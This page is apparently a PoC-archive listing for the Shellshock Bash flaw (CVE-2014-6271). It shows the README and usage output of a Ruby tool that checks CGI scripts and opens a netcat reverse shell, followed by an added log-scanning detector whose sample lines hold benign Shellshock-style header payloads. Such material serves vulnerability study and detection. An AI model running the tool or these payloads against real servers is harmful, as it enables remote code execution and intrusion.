CVE-2014-6271 PoC — GNU Bash Remote Code Execution Vulnerability

Source
Associated Vulnerability
Title: GNU Bash Remote Code Execution Vulnerability (CVE-2014-6271)
Description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
Description
CVE-2014-6271 (ShellShock) RCE PoC tool 
Readme
BadBash
=======

CVE-2014-6271 (ShellShock) RCE PoC tool 

=======
BadBash is a CVE-2014-6271 RCE exploit tool. The basic version only checks HTTP CGI targets and only provides a netcat reverse shell on port 1234.

Developer : Andy Yang 
Version : 0.1.0 
License : GPLv3

Original GitHub project : https://github.com/RainMak3r/Rainstorm

================================================================================================
RainMak3r@Could:~/Desktop# ruby BadBash.rb  -h

BadBash - CVE-2014-6271 RCE tool by Andy Yang
Basic version only checks for HTTP site
Basic version only provides netcat reverse shell on port 1234


EXAMPLE USAGE:

     ./BBash.rb  -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
     ./BBash.rb  -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
    -t, --Target CGI path            Full path of CGI page
    -d, --Destination IP             Your IP address that listen to an inbound connection
    -h, --help                       Display help

================================================================================================
Example of usage.
================================================================================================
RainMak3r@Could:~/Desktop# ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'

[Info]     Checking if the target is vulnerable........

[Info]     This may take up to 10 seconds........

[Info]     Target is vulnerable!!!

[Info]     Please use NC to listen on port 1234 for reverse shell..........

[Info]     Exploiting for a reverse shell to connect 172.16.189.1:1234 via netcat ..........
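
Detection-side view of the HTTP CGI vector this README targets, as an added example (not part of BadBash or the original project): it scans Apache combined-format access log lines for the Bash function-definition marker in the Referer and User-Agent fields, which mod_cgi exports to the script's environment. The log lines, regexes and function names are constructed for illustration.

```ruby
# Added example: flag Shellshock-style values in Apache combined-format logs.
# The log lines below are constructed samples, not captured traffic.

# Vulnerable Bash treats an environment value that begins with "() {" as a
# function definition; optional whitespace is allowed to stay conservative.
FUNC_DEF_MARKER = /\(\)\s*\{/

# host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = /\A(\S+) \S+ \S+ \[([^\]]+)\] "((?:[^"\\]|\\.)*)" (\d{3}) \S+ "((?:[^"\\]|\\.)*)" "((?:[^"\\]|\\.)*)"\z/

# Logged request fields and the CGI environment variables they become.
FIELD_TO_ENV = { referer: 'HTTP_REFERER', user_agent: 'HTTP_USER_AGENT' }.freeze

# Parse one log line into a hash, or nil if it is not combined format.
def parse_line(line)
  m = COMBINED.match(line.chomp)
  return nil unless m
  { client: m[1], time: m[2], request: m[3], status: m[4].to_i,
    referer: m[5], user_agent: m[6] }
end

# One finding per log line that carries the marker in a field that
# would reach Bash as an environment variable.
def shellshock_findings(lines)
  lines.each_with_object([]) do |line, findings|
    entry = parse_line(line)
    next unless entry
    hits = FIELD_TO_ENV.select { |field, _| entry[field] =~ FUNC_DEF_MARKER }.values
    next if hits.empty?
    findings << { client: entry[:client], request: entry[:request],
                  status: entry[:status], env_vars: hits }
  end
end

SAMPLE_LOG = [
  '192.0.2.10 - - [25/Sep/2014:10:00:01 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
  '198.51.100.7 - - [25/Sep/2014:10:00:05 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 200 0 "-" "() { :; }; echo constructed-sample"',
  '198.51.100.7 - - [25/Sep/2014:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 1024 "() { x; }; echo constructed-sample" "curl/7.30.0"',
  '203.0.113.5 - - [25/Sep/2014:10:00:12 +0000] "GET /cgi-bin/a.sh?f=() HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible)"'
].freeze

if __FILE__ == $PROGRAM_NAME
  shellshock_findings(SAMPLE_LOG).each do |f|
    puts "#{f[:client]} #{f[:request]} status=#{f[:status]} via #{f[:env_vars].join(',')}"
  end
end
```

Combined-format logs record only the Referer and User-Agent headers, so values sent in other headers (which mod_cgi also exports as HTTP_* variables) need a custom LogFormat or a WAF/IDS rule to be seen. Triage hits whose request path maps to a CGI handler first; a hit on a static path never reaches Bash.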



File Snapshot

[4.0K] /data/pocs/fe82d479180629da939d9303fa49d5212972c526
├── [3.8K] BadBash.rb
├── [ 34K] LICENSE
└── [1.6K] README.md

0 directories, 3 files